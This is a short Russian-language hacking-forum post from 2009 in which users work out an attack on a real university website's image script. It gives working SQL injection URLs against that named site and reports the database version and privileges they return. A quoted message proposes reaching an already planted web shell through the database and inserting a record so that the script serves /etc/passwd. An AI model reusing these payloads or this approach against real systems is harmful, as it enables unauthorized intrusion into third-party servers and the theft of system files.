18.03.2009, 17:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от jangle
судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd
вроде как, файлы хранятся в базе, а не линки.
http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,111111111,null/*
прав на mysql.user нет
file_priv N
обычная скуля ,с не совсем обычным выводом.
http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,version(),null/*
4.1.22-log
|
|
|